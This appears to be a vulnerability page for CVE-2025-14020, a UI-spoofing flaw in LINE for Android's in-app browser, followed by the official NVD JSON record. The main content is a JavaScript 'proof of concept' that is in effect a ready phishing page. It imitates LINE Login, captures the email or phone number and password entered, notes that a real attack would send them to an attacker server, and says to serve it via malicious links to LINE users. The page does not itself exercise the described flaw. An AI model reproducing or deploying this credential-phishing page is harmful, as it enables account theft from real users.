CVE-2025-14020

// CVE-2025-14020 PoC - UI Spoofing via In-App Browser // This PoC demonstrates the UI spoofing vulnerability in LINE Android's in-app browser const phishingPage = ` <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>LINE Login</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; background: linear-gradient(135deg, #00B900 0%, #00A800 100%); display: flex; justify-content: center; align-items: center; min-height: 100vh; } .login-container { background: white; border-radius: 16px; padding: 40px 30px; width: 90%; max-width: 400px; box-shadow: 0 10px 40px rgba(0,0,0,0.2); } .line-logo { text-align: center; margin-bottom: 30px; } .line-logo img { width: 80px; height: 80px; } h2 { text-align: center; color: #333; margin-bottom: 30px; font-size: 24px; } .input-group { margin-bottom: 20px; } .input-group label { display: block; margin-bottom: 8px; color: #666; font-size: 14px; } .input-group input { width: 100%; padding: 14px; border: 2px solid #e0e0e0; border-radius: 8px; font-size: 16px; transition: border-color 0.3s; } .input-group input:focus { outline: none; border-color: #00B900; } .login-btn { width: 100%; padding: 16px; background: #00B900; color: white; border: none; border-radius: 8px; font-size: 18px; font-weight: bold; cursor: pointer; transition: background 0.3s; } .login-btn:hover { background: #009900; } .security-notice { display: none; // Hidden to simulate missing Toast notification position: fixed; top: 0; left: 0; right: 0; background: #ff3b30; color: white; padding: 10px; text-align: center; font-size: 14px; } </style> </head> <body> <div class="security-notice" id="securityNotice"> ⚠️ Security Warning: You are on a third-party website </div> <div class="login-container"> <div class="line-logo"> <img src="https://scdn.line-apps.com/line/img/ogp/logo.png" alt="LINE"> </div> <h2>LINE Login</h2> <form id="phishingForm"> <div class="input-group"> <label>Email or Phone Number</label> <input type="text" id="credentials" required placeholder="Enter your email or phone"> </div> <div class="input-group"> <label>Password</label> <input type="password" id="password" required placeholder="Enter your password"> </div> <button type="submit" class="login-btn">Log In</button> </form> </div> <script> // Simulate the vulnerability: hide security notice after context switch document.addEventListener('visibilitychange', function() { if (document.hidden) { // User switched apps - security notice should reappear but doesn't console.log('User left the page - Toast should re-display'); } }); // Capture credentials document.getElementById('phishingForm').addEventListener('submit', function(e) { e.preventDefault(); const credentials = document.getElementById('credentials').value; const password = document.getElementById('password').value; // In real attack, send to attacker server console.log('Captured credentials:', { user: credentials, pass: password }); alert('Login successful! (Credentials captured)'); }); </script> </body> </html> `; // Usage: Serve this HTML page via a malicious link sent to LINE users console.log('PoC generated. Serve via web server and send link to LINE Android users.'); console.log('When users return from other apps, security Toast does not re-appear.');

{"cve": {"id": "CVE-2025-14020", "sourceIdentifier": "[email protected]", "published": "2025-12-15T07:15:50.720", "lastModified": "2025-12-18T02:04:03.153", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LINE client for Android versions prior to 14.20 contains a UI spoofing vulnerability in the in-app browser where the full-screen security Toast notification is not properly re-displayed when users return from another application, potentially allowing attackers to conduct phishing attacks by impersonating legitimate interfaces."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:linecorp:line:*:*:*:*:*:android:*:*", "versionEndExcluding": "14.20.0", "matchCriteriaId": "33F31182-C6E7-4A69-8CB3-3CC27B90C42A"}]}]}], "references": [{"url": "https://hackerone.com/reports/2547989", "source": "[email protected]", "tags": ["Permissions Required", "Third Party Advisory"]}]}}